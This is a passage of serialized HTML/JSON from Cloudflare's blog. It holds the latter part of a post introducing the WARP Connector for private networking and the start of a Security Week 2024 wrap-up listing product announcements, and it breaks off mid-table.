aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Here we’ll walk through a couple of key reasons why you may want to deploy our new connector, but remember that this solution can support numerous services, such as Microsoft’s System Center Configuration Manager (SCCM), Active Directory server updates, VOIP and SIP traffic, and developer workflows with complex CI/CD pipeline interaction. It’s also important to note this connector can either be run alongside cloudflared and Magic WAN, or can be a standalone remote access and site-to-site connector to the Cloudflare Global network.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"softphone-and-voip-servers\">Softphone and VOIP servers</h3>\n <a href=\"#softphone-and-voip-servers\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n \n <figure class=\"kg-card kg-image-card \">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1aRUqSm8U71JrJlAjpaR85/097753cc28df73f7d5719633343b18ca/image5-18.png\" alt=\"\" class=\"kg-image\" width=\"1938\" height=\"696\" loading=\"lazy\"/>\n \n </figure><p>For users to establish a voice or video call over a VOIP software service, typically a SIP server within the private network brokers the connection using the last known IP address of the end-user. However, if traffic is proxied anywhere along the path, this often results in participants only receiving partial voice or data signals. With the WARP Connector, customers can now apply granular policies to these services for secure access, fortifying VOIP infrastructure within their <a href=\"https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/\">Zero Trust framework</a>.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"securing-access-to-ci-cd-pipeline\">Securing access to CI/CD pipeline</h3>\n <a href=\"#securing-access-to-ci-cd-pipeline\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n \n <figure class=\"kg-card kg-image-card \">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6Yolk1Mb2eQqmkibRapZzU/2748774f23b3df87d395a11b5d6c8281/image4-29.png\" alt=\"\" class=\"kg-image\" width=\"1842\" height=\"1026\" loading=\"lazy\"/>\n \n </figure><p>An organization’s DevOps ecosystem is generally built out of many parts, but a CI/CD server such as Jenkins or Teamcity is the epicenter of all development activities. Hence, securing that CI/CD server is critical. With the WARP Connector and WARP Client, organizations can secure the entire CI/CD pipeline and also streamline it easily.</p><p>Let&#39;s look at a typical CI/CD pipeline for a Kubernetes application. The environment is set up as depicted in the diagram above, with WARP clients on the developer and QA laptops and a WARP Connector securely connecting the CI/CD server and staging servers on different networks:</p><ol><li><p>Typically, the CI/CD pipeline is triggered when a developer commits their code change, invoking a webhook on the CI/CD server.</p></li><li><p>Once the images are built, it&#39;s time to deploy the code, which is typically done in stages: test, staging and production.</p></li><li><p>Notifications are sent to the developer and QA engineer to notify them when the images are ready in the test/staging environments.</p></li><li><p>QA engineers receive the notifications via webhook from the CI/CD servers to kick-start their monitoring and troubleshooting workflow.</p></li></ol><p>With WARP Connector, customers can easily connect their developers to the tools in the DevOps ecosystem by keeping the ecosystem private and not exposing it to the public. Once the DevOps ecosystem is securely connected to Cloudflare, granular security policies can be easily applied to secure access to the CI/CD pipeline.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"true-source-ip-address-preservation\">True source IP address preservation</h3>\n <a href=\"#true-source-ip-address-preservation\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Organizations running Microsoft AD Servers or non-web application servers often need to identify the true source IP address for auditing or policy application. If these requirements exist, WARP Connector simplifies this, offering solutions without adding NAT boundaries. This can be useful to <a href=\"https://www.cloudflare.com/learning/bots/what-is-rate-limiting/\">rate-limit</a> unhealthy source IP addresses, for ACL-based policies within the perimeter, or to collect additional diagnostics from end-users.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"getting-started-with-warp-connector\">Getting started with WARP Connector</h2>\n <a href=\"#getting-started-with-warp-connector\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>As part of this launch, we’re making some changes to the Cloudflare One Dashboard to better highlight our different network on/off ramp options. As of today, a new “Network” tab will appear on your dashboard. This will be the new home for the Cloudflare Tunnel UI.</p><p>We are also introducing the new “Routes” tab next to “Tunnels”. This page will present an organizational view of customer’s virtual networks, Cloudflare Tunnels, and routes associated with them. This new page helps answer a customer’s questions pertaining to their network configurations, such as: “Which Cloudflare Tunnel has the route to my host 192.168.1.2 ” or “If a route for CIDR 192.168.2.1/28 exists, how can it be accessed” or “What are the overlapping CIDRs in my environment and which VNETs do they belong to?”. This is extremely useful for customers who have very complex enterprise networks that use the Cloudflare dashboard for troubleshooting connectivity issues.</p>\n <figure class=\"kg-card kg-image-card \">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/454aKuxMVd93ZAmtubFPl/ba84f1e86a2c1b0ebaaa7e6e36f29199/image1-32.png\" alt=\"\" class=\"kg-image\" width=\"1999\" height=\"411\" loading=\"lazy\"/>\n \n </figure><p>Embarking on your WARP Connector journey is straightforward. Currently deployable on Linux hosts, users can select “create a Tunnel” and pick from either cloudflared or WARP to deploy straight from the dashboard. Follow our <a href=\"https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/private-net/warp-connector/#set-up-warp-connector\">developer documentation</a> to get started in a few easy steps. In the near future we will be adding support for more platforms where WARP Connectors can be deployed.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"whats-next\">What’s next?</h2>\n <a href=\"#whats-next\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Thank you to all of our private beta customers for their invaluable feedback. Moving forward, our immediate focus in the coming quarters is on simplifying deployment, mirroring that of cloudflared, and enhancing high availability through redundancy and failover mechanisms.</p><p>Stay tuned for more updates as we continue our journey in innovating and enhancing the Cloudflare One platform. We&#39;re excited to see how our customers leverage WARP Connector to transform their connectivity and security landscape.</p>"],"published_at":[0,"2024-03-20T13:00:05.000+00:00"],"updated_at":[0,"2024-10-10T00:22:11.640Z"],"feature_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5dQOyRek8tA2iSz1uDFUv9/d2f8b3a6374ad7456eb0b84cfe9b2b77/introducing-warp-connector-paving-the-path-to-any-to-any-connectivity-2.png"],"tags":[1,[[0,{"id":[0,"2kFnzwwExTv3DVtV0CTReO"],"name":[0,"Cloudflare Tunnel"],"slug":[0,"cloudflare-tunnel"]}],[0,{"id":[0,"6QktrXeEFcl4e2dZUTZVGl"],"name":[0,"Product News"],"slug":[0,"product-news"]}],[0,{"id":[0,"3Jybo7s9hP1t73fq6i4ZWO"],"name":[0,"WARP"],"slug":[0,"warp"]}],[0,{"id":[0,"J61Eszqn98amrYHq4IhTx"],"name":[0,"Zero Trust"],"slug":[0,"zero-trust"]}],[0,{"id":[0,"2UI24t7uddD0CIIUJCu1f4"],"name":[0,"SASE"],"slug":[0,"sase"]}]]],"relatedTags":[0],"authors":[1,[[0,{"name":[0,"Abe Carryl"],"slug":[0,"abe"],"bio":[0,null],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4DGgxZ9N7uw8HNW8wryqK3/1e68936706c30fc25ff7ec527fa6e8c1/abe.jpeg"],"location":[0,"Austin, Texas"],"website":[0,null],"twitter":[0,"@mrlincolnlogs"],"facebook":[0,null]}],[0,{"name":[0,"Janani Rajendiran"],"slug":[0,"janani"],"bio":[0,null],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/64JY7bqYMajp9mwtjhdVTf/ab9114b2fc282ac9302b603e8cb2785c/janani.png"],"location":[0,null],"website":[0,null],"twitter":[0,null],"facebook":[0,null]}]]],"meta_description":[0,null],"primary_author":[0,{}],"localeList":[0,{"name":[0,"Introducing WARP Connector: paving the path to any-to-any connectivity Config"],"enUS":[0,"English for Locale"],"zhCN":[0,"Translated for Locale"],"zhHansCN":[0,"No Page for Locale"],"zhTW":[0,"Translated for Locale"],"frFR":[0,"No Page for Locale"],"deDE":[0,"No Page for Locale"],"itIT":[0,"No Page for Locale"],"jaJP":[0,"Translated for Locale"],"koKR":[0,"Translated for Locale"],"ptBR":[0,"No Page for Locale"],"esLA":[0,"No Page for Locale"],"esES":[0,"No Page for Locale"],"enAU":[0,"No Page for Locale"],"enCA":[0,"No Page for Locale"],"enIN":[0,"No Page for Locale"],"enGB":[0,"No Page for Locale"],"idID":[0,"No Page for Locale"],"ruRU":[0,"No Page for Locale"],"svSE":[0,"No Page for Locale"],"viVN":[0,"No Page for Locale"],"plPL":[0,"No Page for Locale"],"arAR":[0,"No Page for Locale"],"nlNL":[0,"No Page for Locale"],"thTH":[0,"No Page for Locale"],"trTR":[0,"No Page for Locale"],"heIL":[0,"No Page for Locale"],"lvLV":[0,"No Page for Locale"],"etEE":[0,"No Page for Locale"],"ltLT":[0,"No Page for Locale"]}],"url":[0,"https://blog.cloudflare.com/introducing-warp-connector-paving-the-path-to-any-to-any-connectivity-2"],"metadata":[0,{"title":[0,"Introducing WARP Connector: paving the path to any-to-any connectivity"],"description":[0,"Starting today, Zero Trust administrators can deploy our new WARP Connector for simplified any-to-any connectivity"],"imgPreview":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/jMafycueBHZG0bQ5NcgDQ/e6ef4296c6e8e4d7263a5a93cf885acb/introducing-warp-connector-paving-the-path-to-any-to-any-connectivity-2-GgCNSd.png"]}]}],[0,{"id":[0,"19BXuTqacKLPSyjHFzhyxF"],"title":[0,"Security Week 2024 wrap up"],"slug":[0,"security-week-2024-wrap-up"],"excerpt":[0,"A summary of the blog posts and product announcements released during Security Week 2024"],"featured":[0,false],"html":[0,"\n <figure class=\"kg-card kg-image-card \">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1ziJdd54D7lhcTnOu7hPK1/a2aac4fd6b20f12106e557a8e4579a42/image2-29.png\" alt=\"Security Week 2024 wrap up\" class=\"kg-image\" width=\"1800\" height=\"1013\" loading=\"lazy\"/>\n \n </figure><p>The next 12 months have the potential to reshape the global political landscape with elections occurring in more than 80 nations, in 2024, while new technologies, such as AI, capture our imagination and pose new security challenges.</p><p>Against this backdrop, the role of CISOs has never been more important. <a href=\"/why-i-joined-cloudflare-as-chief-security-officer\">Grant Bourzikas</a>, Cloudflare’s Chief Security Officer, shared his views on what the biggest challenges currently facing the security industry are in the Security Week opening <a href=\"/welcome-to-security-week-2024\">blog</a>.</p><p>Over the past week, we announced a number of new products and features that align with what we believe are <a href=\"https://www.cloudflare.com/ciso/\">the most crucial challenges for CISOs</a> around the globe. We released features that span Cloudflare’s product portfolio, ranging from application security to securing employees and cloud infrastructure. We have also published a few stories on how we take a Customer Zero approach to using Cloudflare services to manage security at Cloudflare.</p><p>We hope you find these stories interesting and are excited by the new Cloudflare products. In case you missed any of these announcements, here is a recap of <a href=\"https://www.cloudflare.com/security-week/\">Security Week</a>:</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"responding-to-opportunity-and-risk-from-ai\">Responding to opportunity and risk from AI</h3>\n <a href=\"#responding-to-opportunity-and-risk-from-ai\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <!--kg-card-begin: html--><style type=\"text/css\">\n.tg {border-collapse:collapse;border-color:#ccc;border-spacing:0;}\n.tg td{background-color:#fff;border-color:#ccc;border-style:solid;border-width:1px;color:#333;\n font-family:Arial, sans-serif;font-size:14px;overflow:hidden;padding:10px 5px;word-break:normal;}\n.tg th{background-color:#f0f0f0;border-color:#ccc;border-style:solid;border-width:1px;color:#333;\n font-family:Arial, sans-serif;font-size:14px;font-weight:normal;overflow:hidden;padding:10px 5px;word-break:normal;}\n.tg .tg-f50w{background-color:#F90;font-weight:bold;text-align:left;vertical-align:top}\n.tg .tg-zb5k{color:#15C;text-align:left;vertical-align:top}\n.tg .tg-zb5k a{border-bottom: 0}\n.tg .tg-0lax{text-align:left;vertical-align:top}\n</style>\n<table class=\"tg\" width=\"100%\">\n<thead>\n <tr>\n <th class=\"tg-f50w\"><span style=\"font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Title</span></th>\n <th class=\"tg-f50w\"><span style=\"font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Excerpt</span></th>\n </tr>\n</thead>\n<tbody>\n <tr>\n <td class=\"tg-zb5k\"><a href=\"/firewall-for-ai/\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">Cloudflare announces Firewall for AI</span></a></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Cloudflare announced the development of Firewall for AI, a protection layer that can be deployed in front of Large Language Models (LLMs) to identify abuses and attacks. </span></td>\n </tr>\n <tr>\n <td class=\"tg-zb5k\"><a href=\"/defensive-ai/\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">Defensive AI: Cloudflare’s framework for defending against next-gen threats</span></a></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Defensive AI is the framework Cloudflare uses when integrating intelligent systems into its solutions. Cloudflare’s AI models look at customer traffic patterns, providing that organization with a tailored defense strategy unique to their environment. </span></td>\n </tr>\n <tr>\n <td class=\"tg-zb5k\"><a href=\"/security-analytics-ai-assistant/\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">Cloudflare launches AI Assistant for Security Analytics </span></a></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">We released a natural language assistant as part of Security Analytics. Now it is easier than ever to get powerful insights about your applications by exploring log and security events using the new natural language query interface.</span></td>\n </tr>\n <tr>\n <td class=\"tg-zb5k\"><a href=\"/dispelling-the-generative-ai-fear-how-cloudflare-secures-inboxes-against-ai-enhanced-phishing/\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">Dispelling the Generative AI fear: how Cloudflare secures inboxes against AI-enhanced phishing</span></a></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Generative AI is being used by malicious actors to make phishing attacks much more convincing. Learn how Cloudflare’s email security systems are able to see past the deception using advanced machine learning models.</span></td>\n </tr>\n</tbody>\n</table><!--kg-card-end: html-->\n <div class=\"flex anchor relative\">\n <h3 id=\"maintaining-visibility-and-control-as-applications-and-clouds-change\">Maintaining visibility and control as applications and clouds change</h3>\n <a href=\"#maintaining-visibility-and-control-as-applications-and-clouds-change\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <!--kg-card-begin: html--><style type=\"text/css\">\n.tg {border-collapse:collapse;border-color:#ccc;border-spacing:0;}\n.tg td{background-color:#fff;border-color:#ccc;border-style:solid;border-width:1px;color:#333;\n font-family:Arial, sans-serif;font-size:14px;overflow:hidden;padding:10px 5px;word-break:normal;}\n.tg th{background-color:#f0f0f0;border-color:#ccc;border-style:solid;border-width:1px;color:#333;\n font-family:Arial, sans-serif;font-size:14px;font-weight:normal;overflow:hidden;padding:10px 5px;word-break:normal;}\n.tg .tg-f50w{background-color:#F90;font-weight:bold;text-align:left;vertical-align:top}\n.tg .tg-zb5k{color:#15C;text-align:left;text-decoration:underline;vertical-align:top}\n.tg .tg-zb5k a{border-bottom: 0}\n.tg .tg-0lax{text-align:left;vertical-align:top}\n</style>\n<table class=\"tg\" width=\"100%\">\n<thead>\n <tr>\n <th class=\"tg-f50w\"><span style=\"font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Title</span></th>\n <th class=\"tg-f50w\"><span style=\"font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Excerpt</span></th>\n </tr>\n</thead>\n<tbody>\n <tr>\n <td class=\"tg-zb5k\"><a href=\"/introducing-magic-cloud-networking\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">Magic Cloud Networking simplifies security, connectivity, and management of public clouds</span></a></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Introducing Magic Cloud Networking, a new set of capabilities to visualize and automate cloud networks to give our customers easy, secure, and seamless connection to public cloud environments.</span></td>\n </tr>\n <tr>\n <td class=\"tg-zb5k\"><a href=\"/security-insights-quick-ciso-view/\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">Secure your unprotected assets with Security Center: quick view for CISOs</span></a></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Security Center now includes new tools to address a common challenge: ensuring comprehensive deployment of Cloudflare products across your infrastructure. Gain precise insights into where and how to optimize your security posture.</span></td>\n </tr>\n <tr>\n <td class=\"tg-zb5k\"><a href=\"/dlp-ocr-sourcecode/\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">Announcing two highly requested DLP enhancements: Optical Character Recognition (OCR) and Source Code Detections</span></a></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Cloudflare One now supports Optical Character Recognition and detects source code as part of its Data Loss Prevention service. These two features make it easier for organizations to protect their sensitive data and reduce the risks of breaches.</span></td>\n </tr>\n <tr>\n <td class=\"tg-zb5k\"><a href=\"/cf1-user-risk-score/\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">Introducing behavior-based user risk scoring in Cloudflare One</span></a></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">We are introducing user risk scoring as part of Cloudflare One, a new set of capabilities to detect risk based on user behavior, so that you can improve security posture across your organization.</span></td>\n </tr>\n <tr>\n <td class=\"tg-zb5k\"><a href=\"/eliminate-vpn-vulnerabilities-with-cloudflare-one/\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">Eliminate VPN vulnerabilities with Cloudflare One</span></a></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">The Cybersecurity &amp; Infrastructure Security Agency issued an Emergency Directive due to the Ivanti Connect Secure and Policy Secure vulnerabilities. In this post, we discuss the threat actor tactics exploiting these vulnerabilities and how Cloudflare One can mitigate these risks. </span></td>\n </tr>\n <tr>\n <td class=\"tg-zb5k\"><a href=\"/zero-trust-warp-with-a-masque/\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">Zero Trust WARP: tunneling with a MASQUE</span></a></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">This blog discusses the introduction of MASQUE to Zero Trust WARP and how Cloudflare One customers will benefit from this modern protocol. </span></td>\n </tr>\n <tr>\n <td class=\"tg-zb5k\"><a href=\"/collect-all-your-cookies-in-one-jar/\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">Collect all your cookies in one jar with Page Shield Cookie Monitor</span></a></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Protecting online privacy starts with knowing what cookies are used by your websites. Our client-side security solution, Page Shield, extends transparent monitoring to HTTP cookies.</span></td>\n </tr>\n <tr>\n <td class=\"tg-zb5k\"><a href=\"/gatway-protocol-detection\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">Protocol detection with Cloudflare Gateway</span></a><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\"> </span></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Cloudflare Secure Web Gateway now supports the detection, logging, and filtering of network protocols using packet payloads without the need for inspection. </span></td>\n </tr>\n <tr>\n <td class=\"tg-zb5k\"><a href=\"/threat-intel-rfi-pir/\"><span style=\"font-weight:400;font-style:normal;background-color:transparent\">Introducing Requests for Information (RFIs) and Priority Intelligence Requirements (PIRs) for threat intelligence teams</span></a></td>\n <td class=\"tg-0lax\"><span style=\"font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Our Security Center now houses Requests for Information and Priority Intelligence Requirements. These features are available via API as well and Cloudforce One customers can start leveraging them today for enhanced security analysis. </span></td>\n </tr>\n</tbody>\n</table><!--kg-card-end: html-->\n <div class=\"flex anchor relative\">\n <h3 id=\"consolidating-to-drive-down-costs\">Consolidating to drive down costs</h3>\n <a href=\"#consolidating-to-drive-down-costs\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <!--kg-card-begin: html--><style type=\"text/css\">\n.tg {border-collapse:collapse;border-color:#ccc;border-spacing:0;}\n.tg td{background-color:#fff;border-color:#ccc;border-style:solid;border-width:1px;color:#333;\n font-family:Arial, sans-serif;font-size:14px;overflow:hidden;padding:10px 5px;word-break:normal;}\n.tg th{background-color:#f0f0f0;border-color:#ccc;border-style:solid;border-width:1px;color:#333;\n font-family:Arial, sans-serif;font-size:14px;font-weight:normal;overflow:hidden;padding:10px 5px;word-break:normal;}\n.tg .tg-f50w{background-color:#F90;font-weight:bold;text-align:left;vertical-align:top}\n.tg .tg-zb5k{color:#15C;text-align:left;text-decoration:underline;vertical-align:top}\n.tg .tg-zb5k a{border-bottom: 0}\n.tg .tg-0lax{text-align:left;vertical-align:top}\n</style>\n<table class=\"tg\" width=\"100%\">\n<thead>\n <tr>\n <th class=\"tg-f50w\"><span style=\"font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Title</span></th>\n <th class=\"tg-f50w\"><span style=\"font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent\">Excerpt</span></th>\n </tr>\n</thead>\n<tbody>\n <tr>\n <td class=\"tg-zb5k\"><a href=\"/log-explorer/\"><span 